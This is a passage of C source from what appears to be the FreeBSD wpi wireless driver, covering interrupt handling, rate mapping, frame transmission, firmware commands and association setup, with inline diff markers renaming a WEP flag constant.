mtod(mnew, caddr_t), MJUMPAGESIZE, wpi_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "%s: bus_dmamap_load failed, error %d\n", __func__, error); m_freem(mnew); ifp->if_ierrors++; return; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); /* finalize mbuf and swap in new one */ m = data->m; m->m_pkthdr.rcvif = ifp; m->m_data = (caddr_t)(head + 1); m->m_pkthdr.len = m->m_len = le16toh(head->len); data->m = mnew; /* update Rx descriptor */ ring->desc[ring->cur] = htole32(paddr); if (ieee80211_radiotap_active(ic)) { struct wpi_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_chan_freq = htole16(ic->ic_channels[head->chan].ic_freq); 
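/*
 * The rate switch a few lines below maps the device rate code reported
 * in the Rx header to the net80211 rate in units of 500 kb/s, e.g. CCK
 * code 110 -> 22 (11 Mb/s) and OFDM code 0x3 -> 108 (54 Mb/s); it is
 * the inverse of wpi_plcp_signal() used on the transmit path.
 */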
tap->wr_chan_flags = htole16(ic->ic_channels[head->chan].ic_flags); tap->wr_dbm_antsignal = (int8_t)(stat->rssi - WPI_RSSI_OFFSET); tap->wr_dbm_antnoise = (int8_t)le16toh(stat->noise); tap->wr_tsft = tail->tstamp; tap->wr_antenna = (le16toh(head->flags) >> 4) & 0xf; switch (head->rate) { /* CCK rates */ case 10: tap->wr_rate = 2; break; case 20: tap->wr_rate = 4; break; case 55: tap->wr_rate = 11; break; case 110: tap->wr_rate = 22; break; /* OFDM rates */ case 0xd: tap->wr_rate = 12; break; case 0xf: tap->wr_rate = 18; break; case 0x5: tap->wr_rate = 24; break; case 0x7: tap->wr_rate = 36; break; case 0x9: tap->wr_rate = 48; break; case 0xb: tap->wr_rate = 72; break; case 0x1: tap->wr_rate = 96; break; case 0x3: tap->wr_rate = 108; break; /* unknown rate: should not happen */ default: tap->wr_rate = 0; } if (le16toh(head->flags) & 0x4) tap->wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; } WPI_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, stat->rssi, 0); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, stat->rssi, 0); WPI_LOCK(sc); } static void wpi_tx_intr(struct wpi_softc *sc, struct wpi_rx_desc *desc) { struct ifnet *ifp = sc->sc_ifp; struct wpi_tx_ring *ring = &sc->txq[desc->qid & 0x3]; struct wpi_tx_data *txdata = &ring->data[desc->idx]; struct wpi_tx_stat *stat = (struct wpi_tx_stat *)(desc + 1); struct ieee80211_node *ni = txdata->ni; struct ieee80211vap *vap = ni->ni_vap; int retrycnt = 0; DPRINTFN(WPI_DEBUG_TX, ("tx done: qid=%d idx=%d retries=%d nkill=%d " "rate=%x duration=%d status=%x\n", desc->qid, desc->idx, stat->ntries, stat->nkill, stat->rate, le32toh(stat->duration), le32toh(stat->status))); /* * Update rate control statistics for the node. * XXX we should not count mgmt frames since they're always sent at * the lowest available bit-rate. * XXX frames w/o ACK shouldn't be used either */ if (stat->ntries > 0) { DPRINTFN(WPI_DEBUG_TX, ("%d retries\n", stat->ntries)); retrycnt = 1; } ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); /* XXX oerrors should only count errors !maxtries */ if ((le32toh(stat->status) & 0xff) != 1) ifp->if_oerrors++; else ifp->if_opackets++; bus_dmamap_sync(ring->data_dmat, txdata->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, txdata->map); /* XXX handle M_TXCB? 
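 * Completion callbacks (M_TXCB) are not run here; a fuller
 * implementation would pass the status to ieee80211_process_callback()
 * before the mbuf is freed.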
*/ m_freem(txdata->m); txdata->m = NULL; ieee80211_free_node(txdata->ni); txdata->ni = NULL; ring->queued--; sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; wpi_start_locked(ifp); } static void wpi_cmd_intr(struct wpi_softc *sc, struct wpi_rx_desc *desc) { struct wpi_tx_ring *ring = &sc->cmdq; struct wpi_tx_data *data; DPRINTFN(WPI_DEBUG_CMD, ("cmd notification qid=%x idx=%d flags=%x " "type=%s len=%d\n", desc->qid, desc->idx, desc->flags, wpi_cmd_str(desc->type), le32toh(desc->len))); if ((desc->qid & 7) != 4) return; /* not a command ack */ data = &ring->data[desc->idx]; /* if the command was mapped in a mbuf, free it */ if (data->m != NULL) { bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } sc->flags &= ~WPI_FLAG_BUSY; wakeup(&ring->cmd[desc->idx]); } static void wpi_notif_intr(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_rx_desc *desc; struct wpi_rx_data *data; uint32_t hw; bus_dmamap_sync(sc->shared_dma.tag, sc->shared_dma.map, BUS_DMASYNC_POSTREAD); hw = le32toh(sc->shared->next); while (sc->rxq.cur != hw) { data = &sc->rxq.data[sc->rxq.cur]; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); desc = (void *)data->m->m_ext.ext_buf; DPRINTFN(WPI_DEBUG_NOTIFY, ("notify qid=%x idx=%d flags=%x type=%d len=%d\n", desc->qid, desc->idx, desc->flags, desc->type, le32toh(desc->len))); if (!(desc->qid & 0x80)) /* reply to a command */ wpi_cmd_intr(sc, desc); switch (desc->type) { case WPI_RX_DONE: /* a 802.11 frame was received */ wpi_rx_intr(sc, desc, data); break; case WPI_TX_DONE: /* a 802.11 frame has been transmitted */ wpi_tx_intr(sc, desc); break; case WPI_UC_READY: { struct wpi_ucode_info *uc = (struct wpi_ucode_info *)(desc + 1); /* the microcontroller is ready */ DPRINTF(("microcode alive notification version %x " "alive %x\n", le32toh(uc->version), le32toh(uc->valid))); if (le32toh(uc->valid) != 1) { device_printf(sc->sc_dev, "microcontroller initialization failed\n"); wpi_stop_locked(sc); } break; } case WPI_STATE_CHANGED: { uint32_t *status = (uint32_t *)(desc + 1); /* enabled/disabled notification */ DPRINTF(("state changed to %x\n", le32toh(*status))); if (le32toh(*status) & 1) { device_printf(sc->sc_dev, "Radio transmitter is switched off\n"); sc->flags |= WPI_FLAG_HW_RADIO_OFF; ifp->if_drv_flags &= ~IFF_DRV_RUNNING; /* Disable firmware commands */ WPI_WRITE(sc, WPI_UCODE_SET, WPI_DISABLE_CMD); } break; } case WPI_START_SCAN: { #ifdef WPI_DEBUG struct wpi_start_scan *scan = (struct wpi_start_scan *)(desc + 1); #endif DPRINTFN(WPI_DEBUG_SCANNING, ("scanning channel %d status %x\n", scan->chan, le32toh(scan->status))); break; } case WPI_STOP_SCAN: { #ifdef WPI_DEBUG struct wpi_stop_scan *scan = (struct wpi_stop_scan *)(desc + 1); #endif struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTFN(WPI_DEBUG_SCANNING, ("scan finished nchan=%d status=%d chan=%d\n", scan->nchan, scan->status, scan->chan)); sc->sc_scan_timer = 0; ieee80211_scan_next(vap); break; } case WPI_MISSED_BEACON: { struct wpi_missed_beacon *beacon = (struct wpi_missed_beacon *)(desc + 1); struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); if (le32toh(beacon->consecutive) >= vap->iv_bmissthreshold) { DPRINTF(("Beacon miss: %u >= %u\n", le32toh(beacon->consecutive), vap->iv_bmissthreshold)); ieee80211_beacon_miss(ic); } break; } } sc->rxq.cur = (sc->rxq.cur + 1) % WPI_RX_RING_COUNT; } /* tell the firmware what we have processed */ hw = (hw == 0) ? 
WPI_RX_RING_COUNT - 1 : hw - 1; WPI_WRITE(sc, WPI_RX_WIDX, hw & ~7); } static void wpi_intr(void *arg) { struct wpi_softc *sc = arg; uint32_t r; WPI_LOCK(sc); r = WPI_READ(sc, WPI_INTR); if (r == 0 || r == 0xffffffff) { WPI_UNLOCK(sc); return; } /* disable interrupts */ WPI_WRITE(sc, WPI_MASK, 0); /* ack interrupts */ WPI_WRITE(sc, WPI_INTR, r); if (r & (WPI_SW_ERROR | WPI_HW_ERROR)) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); device_printf(sc->sc_dev, "fatal firmware error\n"); DPRINTFN(6,("(%s)\n", (r & WPI_SW_ERROR) ? "(Software Error)" : "(Hardware Error)")); if (vap != NULL) ieee80211_cancel_scan(vap); ieee80211_runtask(ic, &sc->sc_restarttask); sc->flags &= ~WPI_FLAG_BUSY; WPI_UNLOCK(sc); return; } if (r & WPI_RX_INTR) wpi_notif_intr(sc); if (r & WPI_ALIVE_INTR) /* firmware initialized */ wakeup(sc); /* re-enable interrupts */ if (sc->sc_ifp->if_flags & IFF_UP) WPI_WRITE(sc, WPI_MASK, WPI_INTR_MASK); WPI_UNLOCK(sc); } static uint8_t wpi_plcp_signal(int rate) { switch (rate) { /* CCK rates (returned values are device-dependent) */ case 2: return 10; case 4: return 20; case 11: return 55; case 22: return 110; /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ /* R1-R4 (ral/ural is R4-R1) */ case 12: return 0xd; case 18: return 0xf; case 24: return 0x5; case 36: return 0x7; case 48: return 0x9; case 72: return 0xb; case 96: return 0x1; case 108: return 0x3; /* unsupported rates (should not get there) */ default: return 0; } } /* quickly determine if a given rate is CCK or OFDM */ #define WPI_RATE_IS_OFDM(rate) ((rate) >= 12 && (rate) != 22) /* * Construct the data packet for a transmit buffer and acutally put * the buffer onto the transmit ring, kicking the card to process the * the buffer. */ static int wpi_tx_data(struct wpi_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, int ac) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct chanAccParams *cap = &ic->ic_wme.wme_chanParams; struct wpi_tx_ring *ring = &sc->txq[ac]; struct wpi_tx_desc *desc; struct wpi_tx_data *data; struct wpi_tx_cmd *cmd; struct wpi_cmd_data *tx; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; struct mbuf *mnew; int i, error, nsegs, rate, hdrlen, ismcast; bus_dma_segment_t segs[WPI_MAX_SCATTER]; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; wh = mtod(m0, struct ieee80211_frame *); hdrlen = ieee80211_hdrsize(wh); ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } cmd = &ring->cmd[ring->cur]; cmd->code = WPI_CMD_TX_DATA; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; tx = (struct wpi_cmd_data *)cmd->data; tx->flags = htole32(WPI_TX_AUTO_SEQ); tx->timeout = htole16(0); tx->ofdm_mask = 0xff; tx->cck_mask = 0x0f; tx->lifetime = htole32(WPI_LIFETIME_INFINITE); tx->id = ismcast ? 
WPI_ID_BROADCAST : WPI_ID_BSS; tx->len = htole16(m0->m_pkthdr.len); if (!ismcast) { if ((ni->ni_flags & IEEE80211_NODE_QOS) == 0 || !cap->cap_wmeParams[ac].wmep_noackPolicy) tx->flags |= htole32(WPI_TX_NEED_ACK); if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) { tx->flags |= htole32(WPI_TX_NEED_RTS|WPI_TX_FULL_TXOP); tx->rts_ntries = 7; } } /* pick a rate */ tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT) { uint8_t subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* tell h/w to set timestamp in probe responses */ if (subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) tx->flags |= htole32(WPI_TX_INSERT_TSTAMP); if (subtype == IEEE80211_FC0_SUBTYPE_ASSOC_REQ || subtype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) tx->timeout = htole16(3); else tx->timeout = htole16(2); rate = tp->mgmtrate; } else if (ismcast) { rate = tp->mcastrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = tp->ucastrate; } else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } tx->rate = wpi_plcp_signal(rate); /* be very persistant at sending frames out */ #if 0 tx->data_ntries = tp->maxretry; #else tx->data_ntries = 15; /* XXX way too high */ #endif if (ieee80211_radiotap_active_vap(vap)) { struct wpi_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_hwqueue = ac; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) tap->wt_flags |= IEEE80211_RADIOTAP_F_WEP; ieee80211_radiotap_tx(vap, m0); } /* save and trim IEEE802.11 header */ m_copydata(m0, 0, hdrlen, (caddr_t)&tx->wh); m_adj(m0, hdrlen); error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m0, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { /* XXX use m_collapse */ mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m0, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } } data->m = m0; data->ni = ni; DPRINTFN(WPI_DEBUG_TX, ("sending data: qid=%d idx=%d len=%d nsegs=%d\n", ring->qid, ring->cur, m0->m_pkthdr.len, nsegs)); /* first scatter/gather segment is used by the tx data command */ desc->flags = htole32(WPI_PAD32(m0->m_pkthdr.len) << 28 | (1 + nsegs) << 24); desc->segs[0].addr = htole32(ring->cmd_dma.paddr + ring->cur * sizeof (struct wpi_tx_cmd)); desc->segs[0].len = htole32(4 + sizeof (struct wpi_cmd_data)); for (i = 1; i <= nsegs; i++) { desc->segs[i].addr = htole32(segs[i - 1].ds_addr); desc->segs[i].len = htole32(segs[i - 1].ds_len); } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); ring->queued++; /* kick ring */ ring->cur = (ring->cur + 1) % WPI_TX_RING_COUNT; WPI_WRITE(sc, WPI_TX_WIDX, ring->qid << 8 | ring->cur); return 0; } /** * Process data waiting to be sent on the IFNET output queue */ static void wpi_start(struct ifnet *ifp) { struct wpi_softc *sc = ifp->if_softc; WPI_LOCK(sc); wpi_start_locked(ifp); WPI_UNLOCK(sc); } static void wpi_start_locked(struct ifnet *ifp) { struct wpi_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; int ac; 
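/*
 * Drain the interface send queue: each mbuf carries its node reference
 * in m_pkthdr.rcvif and is mapped to the WME access category returned
 * by M_WME_GETAC(); the loop stops early and sets IFF_DRV_OACTIVE when
 * fewer than 8 free slots remain in the target Tx ring.
 */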
WPI_LOCK_ASSERT(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ac = M_WME_GETAC(m); if (sc->txq[ac].queued > sc->txq[ac].count - 8) { /* there is no place left in this ring */ IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (wpi_tx_data(sc, m, ni, ac) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } sc->sc_tx_timer = 5; } } static int wpi_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } WPI_LOCK(sc); /* management frames go into ring 0 */ if (sc->txq[0].queued > sc->txq[0].count - 8) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; m_freem(m); WPI_UNLOCK(sc); ieee80211_free_node(ni); return ENOBUFS; /* XXX */ } ifp->if_opackets++; if (wpi_tx_data(sc, m, ni, 0) != 0) goto bad; sc->sc_tx_timer = 5; callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); WPI_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; WPI_UNLOCK(sc); ieee80211_free_node(ni); return EIO; /* XXX */ } static int wpi_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct wpi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: WPI_LOCK(sc); if ((ifp->if_flags & IFF_UP)) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { wpi_init_locked(sc, 0); startall = 1; } } else if ((ifp->if_drv_flags & IFF_DRV_RUNNING) || (sc->flags & WPI_FLAG_HW_RADIO_OFF)) wpi_stop_locked(sc); WPI_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } /* * Extract various information from EEPROM. */ static void wpi_read_eeprom(struct wpi_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { int i; /* read the hardware capabilities, revision and SKU type */ wpi_read_prom_data(sc, WPI_EEPROM_CAPABILITIES, &sc->cap,1); wpi_read_prom_data(sc, WPI_EEPROM_REVISION, &sc->rev,2); wpi_read_prom_data(sc, WPI_EEPROM_TYPE, &sc->type, 1); /* read the regulatory domain */ wpi_read_prom_data(sc, WPI_EEPROM_DOMAIN, sc->domain, 4); /* read in the hw MAC address */ wpi_read_prom_data(sc, WPI_EEPROM_MAC, macaddr, 6); /* read the list of authorized channels */ for (i = 0; i < WPI_CHAN_BANDS_COUNT; i++) wpi_read_eeprom_channels(sc,i); /* read the power level calibration info for each group */ for (i = 0; i < WPI_POWER_GROUPS_COUNT; i++) wpi_read_eeprom_group(sc,i); } /* * Send a command to the firmware. 
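 * Synchronous callers hold the driver lock and sleep on the command
 * slot until wpi_cmd_intr() wakes them; asynchronous callers return as
 * soon as the descriptor has been handed to the command ring.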
*/ static int wpi_cmd(struct wpi_softc *sc, int code, const void *buf, int size, int async) { struct wpi_tx_ring *ring = &sc->cmdq; struct wpi_tx_desc *desc; struct wpi_tx_cmd *cmd; #ifdef WPI_DEBUG if (!async) { WPI_LOCK_ASSERT(sc); } #endif DPRINTFN(WPI_DEBUG_CMD,("wpi_cmd %d size %d async %d\n", code, size, async)); if (sc->flags & WPI_FLAG_BUSY) { device_printf(sc->sc_dev, "%s: cmd %d not sent, busy\n", __func__, code); return EAGAIN; } sc->flags|= WPI_FLAG_BUSY; KASSERT(size <= sizeof cmd->data, ("command %d too large: %d bytes", code, size)); desc = &ring->desc[ring->cur]; cmd = &ring->cmd[ring->cur]; cmd->code = code; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; memcpy(cmd->data, buf, size); desc->flags = htole32(WPI_PAD32(size) << 28 | 1 << 24); desc->segs[0].addr = htole32(ring->cmd_dma.paddr + ring->cur * sizeof (struct wpi_tx_cmd)); desc->segs[0].len = htole32(4 + size); /* kick cmd ring */ ring->cur = (ring->cur + 1) % WPI_CMD_RING_COUNT; WPI_WRITE(sc, WPI_TX_WIDX, ring->qid << 8 | ring->cur); if (async) { sc->flags &= ~ WPI_FLAG_BUSY; return 0; } return msleep(cmd, &sc->sc_mtx, PCATCH, "wpicmd", hz); } static int wpi_wme_update(struct ieee80211com *ic) { #define WPI_EXP2(v) htole16((1 << (v)) - 1) #define WPI_USEC(v) htole16(IEEE80211_TXOP_TO_US(v)) struct wpi_softc *sc = ic->ic_ifp->if_softc; const struct wmeParams *wmep; struct wpi_wme_setup wme; int ac; /* don't override default WME values if WME is not actually enabled */ if (!(ic->ic_flags & IEEE80211_F_WME)) return 0; wme.flags = 0; for (ac = 0; ac < WME_NUM_AC; ac++) { wmep = &ic->ic_wme.wme_chanParams.cap_wmeParams[ac]; wme.ac[ac].aifsn = wmep->wmep_aifsn; wme.ac[ac].cwmin = WPI_EXP2(wmep->wmep_logcwmin); wme.ac[ac].cwmax = WPI_EXP2(wmep->wmep_logcwmax); wme.ac[ac].txop = WPI_USEC(wmep->wmep_txopLimit); DPRINTF(("setting WME for queue %d aifsn=%d cwmin=%d cwmax=%d " "txop=%d\n", ac, wme.ac[ac].aifsn, wme.ac[ac].cwmin, wme.ac[ac].cwmax, wme.ac[ac].txop)); } return wpi_cmd(sc, WPI_CMD_SET_WME, &wme, sizeof wme, 1); #undef WPI_USEC #undef WPI_EXP2 } /* * Configure h/w multi-rate retries. */ static int wpi_mrr_setup(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_mrr_setup mrr; int i, error; memset(&mrr, 0, sizeof (struct wpi_mrr_setup)); /* CCK rates (not used with 802.11a) */ for (i = WPI_CCK1; i <= WPI_CCK11; i++) { mrr.rates[i].flags = 0; mrr.rates[i].signal = wpi_ridx_to_plcp[i]; /* fallback to the immediate lower CCK rate (if any) */ mrr.rates[i].next = (i == WPI_CCK1) ? WPI_CCK1 : i - 1; /* try one time at this rate before falling back to "next" */ mrr.rates[i].ntries = 1; } /* OFDM rates (not used with 802.11b) */ for (i = WPI_OFDM6; i <= WPI_OFDM54; i++) { mrr.rates[i].flags = 0; mrr.rates[i].signal = wpi_ridx_to_plcp[i]; /* fallback to the immediate lower OFDM rate (if any) */ /* we allow fallback from OFDM/6 to CCK/2 in 11b/g mode */ mrr.rates[i].next = (i == WPI_OFDM6) ? ((ic->ic_curmode == IEEE80211_MODE_11A) ? 
WPI_OFDM6 : WPI_CCK2) : i - 1; /* try one time at this rate before falling back to "next" */ mrr.rates[i].ntries = 1; } /* setup MRR for control frames */ mrr.which = WPI_MRR_CTL; error = wpi_cmd(sc, WPI_CMD_MRR_SETUP, &mrr, sizeof mrr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not setup MRR for control frames\n"); return error; } /* setup MRR for data frames */ mrr.which = WPI_MRR_DATA; error = wpi_cmd(sc, WPI_CMD_MRR_SETUP, &mrr, sizeof mrr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not setup MRR for data frames\n"); return error; } return 0; } static void wpi_set_led(struct wpi_softc *sc, uint8_t which, uint8_t off, uint8_t on) { struct wpi_cmd_led led; led.which = which; led.unit = htole32(100000); /* on/off in unit of 100ms */ led.off = off; led.on = on; (void)wpi_cmd(sc, WPI_CMD_SET_LED, &led, sizeof led, 1); } static void wpi_enable_tsf(struct wpi_softc *sc, struct ieee80211_node *ni) { struct wpi_cmd_tsf tsf; uint64_t val, mod; memset(&tsf, 0, sizeof tsf); memcpy(&tsf.tstamp, ni->ni_tstamp.data, 8); tsf.bintval = htole16(ni->ni_intval); tsf.lintval = htole16(10); /* compute remaining time until next beacon */ val = (uint64_t)ni->ni_intval * 1024; /* msec -> usec */ mod = le64toh(tsf.tstamp) % val; tsf.binitval = htole32((uint32_t)(val - mod)); if (wpi_cmd(sc, WPI_CMD_TSF, &tsf, sizeof tsf, 1) != 0) device_printf(sc->sc_dev, "could not enable TSF\n"); } #if 0 /* * Build a beacon frame that the firmware will broadcast periodically in * IBSS or HostAP modes. */ static int wpi_setup_beacon(struct wpi_softc *sc, struct ieee80211_node *ni) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_tx_ring *ring = &sc->cmdq; struct wpi_tx_desc *desc; struct wpi_tx_data *data; struct wpi_tx_cmd *cmd; struct wpi_cmd_beacon *bcn; struct ieee80211_beacon_offsets bo; struct mbuf *m0; bus_addr_t physaddr; int error; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; m0 = ieee80211_beacon_alloc(ic, ni, &bo); if (m0 == NULL) { device_printf(sc->sc_dev, "could not allocate beacon frame\n"); return ENOMEM; } cmd = &ring->cmd[ring->cur]; cmd->code = WPI_CMD_SET_BEACON; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; bcn = (struct wpi_cmd_beacon *)cmd->data; memset(bcn, 0, sizeof (struct wpi_cmd_beacon)); bcn->id = WPI_ID_BROADCAST; bcn->ofdm_mask = 0xff; bcn->cck_mask = 0x0f; bcn->lifetime = htole32(WPI_LIFETIME_INFINITE); bcn->len = htole16(m0->m_pkthdr.len); bcn->rate = (ic->ic_curmode == IEEE80211_MODE_11A) ? 
wpi_plcp_signal(12) : wpi_plcp_signal(2); bcn->flags = htole32(WPI_TX_AUTO_SEQ | WPI_TX_INSERT_TSTAMP); /* save and trim IEEE802.11 header */ m_copydata(m0, 0, sizeof (struct ieee80211_frame), (caddr_t)&bcn->wh); m_adj(m0, sizeof (struct ieee80211_frame)); /* assume beacon frame is contiguous */ error = bus_dmamap_load(ring->data_dmat, data->map, mtod(m0, void *), m0->m_pkthdr.len, wpi_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map beacon\n"); m_freem(m0); return error; } data->m = m0; /* first scatter/gather segment is used by the beacon command */ desc->flags = htole32(WPI_PAD32(m0->m_pkthdr.len) << 28 | 2 << 24); desc->segs[0].addr = htole32(ring->cmd_dma.paddr + ring->cur * sizeof (struct wpi_tx_cmd)); desc->segs[0].len = htole32(4 + sizeof (struct wpi_cmd_beacon)); desc->segs[1].addr = htole32(physaddr); desc->segs[1].len = htole32(m0->m_pkthdr.len); /* kick cmd ring */ ring->cur = (ring->cur + 1) % WPI_CMD_RING_COUNT; WPI_WRITE(sc, WPI_TX_WIDX, ring->qid << 8 | ring->cur); return 0; } #endif static int wpi_auth(struct wpi_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni = vap->iv_bss; struct wpi_node_info node; int error; /* update adapter's configuration */ sc->config.associd = 0; sc->config.filter &= ~htole32(WPI_FILTER_BSS); IEEE80211_ADDR_COPY(sc->config.bssid, ni->ni_bssid); sc->config.chan = ieee80211_chan2ieee(ic, ni->ni_chan); if (IEEE80211_IS_CHAN_2GHZ(ni->ni_chan)) { sc->config.flags |= htole32(WPI_CONFIG_AUTO | WPI_CONFIG_24GHZ); } else { sc->config.flags &= ~htole32(WPI_CONFIG_AUTO | WPI_CONFIG_24GHZ); } if (IEEE80211_IS_CHAN_A(ni->ni_chan)) { sc->config.cck_mask = 0; sc->config.ofdm_mask = 0x15; } else if (IEEE80211_IS_CHAN_B(ni->ni_chan)) { sc->config.cck_mask = 0x03; sc->config.ofdm_mask = 0; } else { /* XXX assume 802.11b/g */ sc->config.cck_mask = 0x0f; sc->config.ofdm_mask = 0x15; } DPRINTF(("config chan %d flags %x cck %x ofdm %x\n", sc->config.chan, sc->config.flags, sc->config.cck_mask, sc->config.ofdm_mask)); error = wpi_cmd(sc, WPI_CMD_CONFIGURE, &sc->config, sizeof (struct wpi_config), 1); if (error != 0) { device_printf(sc->sc_dev, "could not configure\n"); return error; } /* configuration has changed, set Tx power accordingly */ if ((error = wpi_set_txpower(sc, ni->ni_chan, 1)) != 0) { device_printf(sc->sc_dev, "could not set Tx power\n"); return error; } /* add default node */ memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.bssid, ni->ni_bssid); node.id = WPI_ID_BSS; node.rate = (ic->ic_curmode == IEEE80211_MODE_11A) ? 
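/* lowest rate for the BSS node: OFDM 6 Mb/s on 11a, CCK 1 Mb/s otherwise */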
wpi_plcp_signal(12) : wpi_plcp_signal(2); node.action = htole32(WPI_ACTION_SET_RATE); node.antenna = WPI_ANTENNA_BOTH; error = wpi_cmd(sc, WPI_CMD_ADD_NODE, &node, sizeof node, 1); if (error != 0) device_printf(sc->sc_dev, "could not add BSS node\n"); return (error); } static int wpi_run(struct wpi_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni = vap->iv_bss; int error; if (vap->iv_opmode == IEEE80211_M_MONITOR) { /* link LED blinks while monitoring */ wpi_set_led(sc, WPI_LED_LINK, 5, 5); return 0; } wpi_enable_tsf(sc, ni); /* update adapter's configuration */ sc->config.associd = htole16(ni->ni_associd & ~0xc000); /* short preamble/slot time are negotiated when associating */ sc->config.flags &= ~htole32(WPI_CONFIG_SHPREAMBLE | WPI_CONFIG_SHSLOT); if (ic->ic_flags & IEEE80211_F_SHSLOT) sc->config.flags |= htole32(WPI_CONFIG_SHSLOT); if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) sc->config.flags |= htole32(WPI_CONFIG_SHPREAMBLE); sc->config.filter |= htole32(WPI_FILTER_BSS); /* XXX put somewhere 